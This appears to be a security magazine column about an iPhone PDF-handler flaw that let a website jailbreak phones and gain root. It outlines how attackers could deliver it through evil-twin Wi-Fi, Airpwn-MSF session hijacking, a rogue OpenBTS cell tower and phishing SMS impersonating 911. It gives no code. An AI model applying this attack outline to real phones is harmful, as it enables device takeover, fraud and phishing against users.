Transmissions

My Smartphone Can Beat Up Your Smartphone

by Dragorn

So the other month, there was a new jailbreak vulnerability on the iPhone.

Much hilarity and glee ensued - not only was it a simple jailbreak (just go to a website, no need to even plug it into a PC), but who wouldn't love going into Apple stores and jailbreaking the demo phones?  Apparently, at least a few couldn't resist the temptation.

For those somehow unaware, Apple has decided to restrict the iPhone to only run applications they have approved; the only "legitimate" method to install applications onto your phone is through the Apple marketplace.  Jailbreaking an iPhone breaks this lockdown and installs a third-party application manager, typically Cydia, which lets any application be installed.  Jailbreaking is also usually the first step towards unlocking the phone to work on carriers other than AT&T.

However, to be able to install another marketplace, and to install arbitrary applications, obviously a higher level of access is required.  So what, really, is this website doing to pull it off?  Turns out there is a vulnerability in the PDF handler (surprisingly, in this case, it looks like the bug is in Apple's PDF interpreting code, not Adobe's) that allows for arbitrary code execution.  That's pretty bad.  Due to the privilege model on the iPhone being relatively limited, this bug can be used to gain root access.  That's worse.

What's so bad about a website that lets someone break out of the censorship process Apple applies to apps?  Nothing - except that jailbreaking is the best thing that could happen to the phone in this situation.  Remember that the attack leads to full root access on the device.  On a computer, this would be considered completely defeating the security, giving an attacker free reign... and a smartphone is no different!

If jailbreaking is the best case scenario, what's the worst case? Just about anything imaginable.  From the top of my head, how about spyware that logs passwords to services and sends the phone user's identity and location to an attacker, malware which dials 1-900 numbers at night or sends premium SMS messages?  Want even more fun?  Load the Metasploit iPwn module into the phone and use it as a stage to inject more code.

For this to really be a problem you'd have to be able to get the iPhone to visit a malicious web page, of course.  But anyone who came to the talk Renderman and I gave at The Next HOPE knows this is trivial: As we discussed in the talk, once a client leaves a protected network and goes out into the world of shared public networks, it becomes extremely vulnerable.

The simplest attack? The "evil twin" AP cloning attack, where a hostile AP copies the SSID of a legitimate network, and hijacks all the traffic. Once you control the Layer 2 network, replacing the content of web pages (anything that isn't using HTTPS anyhow) is trivial - someone even made an AP which implements the "upside-down-ternet" where all the images are flipped, as a joke.  By rewriting the traffic with a transparent proxy or with the firewall, any web request through a hostile AP can be turned into an exploit which hijacks the phone through the PDF exploit.

However, any unencrypted traffic is also vulnerable to a "man-in-the-middle" hijack attack, which lets the attacker take control of the TCP session, replacing the content.  TCP sessions are only secure from attack because the sequence and acknowledgment numbers are randomized for each connection.  When an attacker is able to see the numbers, for example when they are sent out into the air on an unencrypted open Wi-Fi network, inserting content into the stream is trivial.  It's so trivial that Metasploit comes with a module to do it - Airpwn-MSF.

Almost any Linux system should be capable of running Metasploit and Airpwn-MSF, though it does need driver support for packet injection on Wi-Fi.  While the drivers on Android-based phones can't do it, the drivers on the Nokia N900 sure can, meaning the person sitting next to you poking around on their phone might be hijacking your web sessions and rootkit'ing your phone.

There are even more creative ways to exploit this problem, however.  The OpenBTS work demonstrated by Chris Paget at DEFCON this summer, for example, lets you build a cell phone tower for about $1500, and it'll fit in a backpack.  A full GSM tower, capable of operating with commercial phones, for $1500, using the GNU Radio project, a programmable software radio.

Fifteen hundred sounds like a fair bit of money, and it is, but when the payoff is a network of possibly hundreds or thousands of hijacked devices earning money through fraudulent charges, the cost-to-payoff ratio becomes very interesting.  In this case, we can define "interesting" as "terrifying."  Is bringing up a rogue cell tower illegal?  Sure is, but so is fraud and most of the methods used by malware authors today.

What does bringing up our own tower let us do?  Several things: Firstly, we can capture the phone and get the phone identity, which allows us to send an SMS to it directly.  Secondly, we can prevent it from using cell data for web pages (in fact, we can't allow it to use cell data, since the OpenBTS project doesn't yet support data modes, but in this case this is a benefit, not a detriment).

Being able to send the user a message makes this attack much more likely to land, and much, much scarier.  Phishing works, and still works fairly well, over email.  How many users are likely to respond to the lure in a well-written SMS?  How about an SMS from 911 demanding they click a link to confirm their status, or police will be dispatched?  We're not used to applying the same suspicion to phones which we do to emails, and I'm positive that the general iPhone population is unprepared to think about hostile SMS messages from important numbers.

By preventing the phone from using cell data, we can ensure that we'll be able to see the user's traffic on Wi-Fi, either by hijacking it, or by running an access point using Karma or Airbase-ng to respond to all queries, pretending to be whatever network the phone is looking for.

What this all means is while this bug is still in the wild, there is no safe way to use an iPhone while the Wi-Fi is enabled.  I'm reasonably confident that every user didn't go disabling Wi-Fi for a week and a half.  In fact, I'm reasonably confident that most users never even knew this bug existed, and if they did know about the jailbreak opportunities, they only considered them in the context of being able to install their own apps.

Because the iPhone is a closed system, there is no real way to fix it until Apple releases a fix - without using the exploit itself to install a third-party fix!  To keep your phone from getting rooted, you have to root it.

Apple has finally rolled out a fix - for some devices - after over a week.  Devices which can't (or don't) run iOS 4 or newer still don't have a fix.

This attack is a frightening example of the risks of smart phones.  We've come to expect that our computers are a risk (though most people may not), but our phones are somehow considered a walled garden which we can use for anything without fear.

Did someone use this attack already to mass-own iPhones?

I have no idea, but it was definitely possible.  The information was out there, the window was open for long enough, and the methods ranged from "reasonably cheap if you're looking to commit a lot of fraud" to "free" if you had a system capable already.

These risks aren't limited to the iPhone, either, though it sure is fun to pick on Apple.  Any large number of devices running identical software are ripe for this kind of attack, and I'm sure over time we will see similar for Android and BlackBerry devices.

The smarter our peripherals get, the bigger their attack surface, and the more risk we face from them.